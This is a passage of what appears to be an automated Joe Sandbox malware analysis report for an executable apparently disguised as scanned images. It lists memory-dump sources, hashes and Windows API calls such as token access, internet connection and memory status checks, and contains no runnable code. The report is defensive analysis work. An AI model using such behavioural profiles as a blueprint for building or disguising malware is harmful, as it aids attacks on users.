                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObjectStockText
                                                                                • String ID:
                                                                                • API String ID: 4037423528-0
                                                                                • Opcode ID: dadbf80e261d5b62f94c8810c0939905c326115c0289329d942f97c0ef55c7b6
                                                                                • Instruction ID: e33603a4d55b663528bf754fae2a312cc06a50e9aab07d1e153b54852d877060
                                                                                • Opcode Fuzzy Hash: dadbf80e261d5b62f94c8810c0939905c326115c0289329d942f97c0ef55c7b6
                                                                                • Instruction Fuzzy Hash: 96E06D31244680BADB215B78EC89BE97F20EB22336F04832AF6FA581E2C37546419F15
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 004B1634
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,004B11D9), ref: 004B163B
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004B11D9), ref: 004B1648
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,004B11D9), ref: 004B164F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: f3f132698345402964f257018a71999227e2830ceae5fd839c773d778bd1aaee
                                                                                • Instruction ID: 11e28d4170dd770529579ab63edf3af55017f0cb8c13355b0cbdffcadd610865
                                                                                • Opcode Fuzzy Hash: f3f132698345402964f257018a71999227e2830ceae5fd839c773d778bd1aaee
                                                                                • Instruction Fuzzy Hash: 9DE08631A01211DBD7201FE49D8DB973B7CAF54791F144829F646CD091D7384442C7A8
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 004AD858
                                                                                • GetDC.USER32(00000000), ref: 004AD862
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AD882
                                                                                • ReleaseDC.USER32(?), ref: 004AD8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 1dc4bdeb2b46953f85ab8ca449c5a2b39e41431561fb9d9105ec4fbd956e57b4
                                                                                • Instruction ID: 833643ddd91d2c3440817605cd80a29e743cd0515d4c7a17ecc4439618ae711a
                                                                                • Opcode Fuzzy Hash: 1dc4bdeb2b46953f85ab8ca449c5a2b39e41431561fb9d9105ec4fbd956e57b4
                                                                                • Instruction Fuzzy Hash: A8E01AB5C00204DFCF41AFB5D88866EBBB2FB48311F10842AE816EB251C7384903AF49
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 004AD86C
                                                                                • GetDC.USER32(00000000), ref: 004AD876
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AD882
                                                                                • ReleaseDC.USER32(?), ref: 004AD8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 2134b0a8563bbcb2061a9f8dcc365907cc5cfd288bc8a14c29b2a63eebbc2385
                                                                                • Instruction ID: 70ce21e2603f8b1f4f9a9bbdb90b6bc4c78326b6acba48628e33c80385491ba4
                                                                                • Opcode Fuzzy Hash: 2134b0a8563bbcb2061a9f8dcc365907cc5cfd288bc8a14c29b2a63eebbc2385
                                                                                • Instruction Fuzzy Hash: E1E01A75C00200DFCF409FB4D88866EBBB1BB48311B108419E816EB251C73859039F48
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 004C4ED4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Connection_wcslen
                                                                                • String ID: *$LPT
                                                                                • API String ID: 1725874428-3443410124
                                                                                • Opcode ID: 051e03c3b32d39ada80adf87d02e58e33f90e3a535485805ccc7ed4ce7acb6f1
                                                                                • Instruction ID: cf3ef47fcc9fc65c8681dbbde936754a16444b6a29ed661bf1a88c54ae03bd09
                                                                                • Opcode Fuzzy Hash: 051e03c3b32d39ada80adf87d02e58e33f90e3a535485805ccc7ed4ce7acb6f1
                                                                                • Instruction Fuzzy Hash: 75918F78A002049FCB54DF54C594FAABBF1AF84308F15809EE84A9F362D739ED85CB55
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0047E30D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: 170238ad0246a192f8bf3404401e95c98d8e3681746b85b856b4688777423c9d
                                                                                • Instruction ID: b861eac9d544f15d79f75c96617b55086cbfe051e33ca76e62529099d8edf46f
                                                                                • Opcode Fuzzy Hash: 170238ad0246a192f8bf3404401e95c98d8e3681746b85b856b4688777423c9d
                                                                                • Instruction Fuzzy Hash: 80512861A0C20296CB117715C9513BF3BA4AB54740F34CEEBE499433A9EB3DCC959B4E
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(004A569E,00000000,?,004ECC08,?,00000000,00000000), ref: 004D78DD
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • CharUpperBuffW.USER32(004A569E,00000000,?,004ECC08,00000000,?,00000000,00000000), ref: 004D783B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$_wcslen
                                                                                • String ID: <sQ
                                                                                • API String ID: 3544283678-3394145969
                                                                                • Opcode ID: ac91da1bd2f92965dd9a1590f87ad8438ecfd6f2b79fae512bfd6d5922377923
                                                                                • Instruction ID: 4c4cebb46a192e4c881125613387f7c82477d31ce4087dfe623d253fe085399e
                                                                                • Opcode Fuzzy Hash: ac91da1bd2f92965dd9a1590f87ad8438ecfd6f2b79fae512bfd6d5922377923
                                                                                • Instruction Fuzzy Hash: FB6164729141189ACF04FBA5CCA1DFDB374BF14305B44052BF942A7252FB385A49DBA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: 77b918550989552c06c47d409dc80b631703e48c31b6644da4ef63729e1be370
                                                                                • Instruction ID: f74c97f5cae78128e829dfa863d4f72036b9993a6b8597bf4e1d33d48fae149e
                                                                                • Opcode Fuzzy Hash: 77b918550989552c06c47d409dc80b631703e48c31b6644da4ef63729e1be370
                                                                                • Instruction Fuzzy Hash: 58513279500246DFDB14DF2AC0916BB7BA5EF66310F24405BE8619B280E6389D43CBAA
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 0046F2A2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0046F2BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: 3ae79e5a7c0d64c27c5c4d36af54f6baaed46d1335aaafb611ec759e627e5e45
                                                                                • Instruction ID: 6139f23c25b47c9200ec9f2bc8a7a00efb73d64b92fed30b1c0a2c6a63bf8401
                                                                                • Opcode Fuzzy Hash: 3ae79e5a7c0d64c27c5c4d36af54f6baaed46d1335aaafb611ec759e627e5e45
                                                                                • Instruction Fuzzy Hash: 995136724087449BD320AF11EC86BAFBBE8FB94305F81885DF5D941196EB34852DCB6B
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004D57E0
                                                                                • _wcslen.LIBCMT ref: 004D57EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper_wcslen
                                                                                • String ID: CALLARGARRAY
                                                                                • API String ID: 157775604-1150593374
                                                                                • Opcode ID: 7a001a96a9618938f81b4c2cc1ccece17343cb01d405c0f85bc24dd18bcf417c
                                                                                • Instruction ID: a84d8209a97edb506577d44b1a122c5a74cbc9280d1ac266c95df22a937a2f74
                                                                                • Opcode Fuzzy Hash: 7a001a96a9618938f81b4c2cc1ccece17343cb01d405c0f85bc24dd18bcf417c
                                                                                • Instruction Fuzzy Hash: 2F418271A002059FCB14EFAAC8918BEBBB5EF59355F10406FF505A7352EB389D41CB94
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004CD130
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004CD13A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_wcslen
                                                                                • String ID: |
                                                                                • API String ID: 596671847-2343686810
                                                                                • Opcode ID: 0dfd42092d39c1abad762498e3729f3beaa7c3e90a4a83f8171e8cf6844b405a
                                                                                • Instruction ID: 7f07fc2c5692ec9fe3b699108b3a6779b8d7a20ebef899cacb32e2886b026ef6
                                                                                • Opcode Fuzzy Hash: 0dfd42092d39c1abad762498e3729f3beaa7c3e90a4a83f8171e8cf6844b405a
                                                                                • Instruction Fuzzy Hash: 94310975D01109ABCF55EFA5CC85EEE7FB9FF04304F00002AF815A6262DB35AA56CB54
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 004E3621
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004E365C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004E461F
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E4634
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004E327C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E3287
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                APIs
                                                                                  • Part of subcall function 0045600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
                                                                                  • Part of subcall function 0045600E: GetStockObject.GDI32(00000011), ref: 00456060
                                                                                  • Part of subcall function 0045600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004E377A
                                                                                • GetSysColor.USER32(00000012), ref: 004E3794
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004CCD7D
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004CCDA6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004E34AB
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004E34BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 004B6CB6
                                                                                • _wcslen.LIBCMT ref: 004B6CC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: STOP
                                                                                • API String ID: 1256254125-2411985666
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004B1D4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 004B1C46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 004B1CC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                APIs
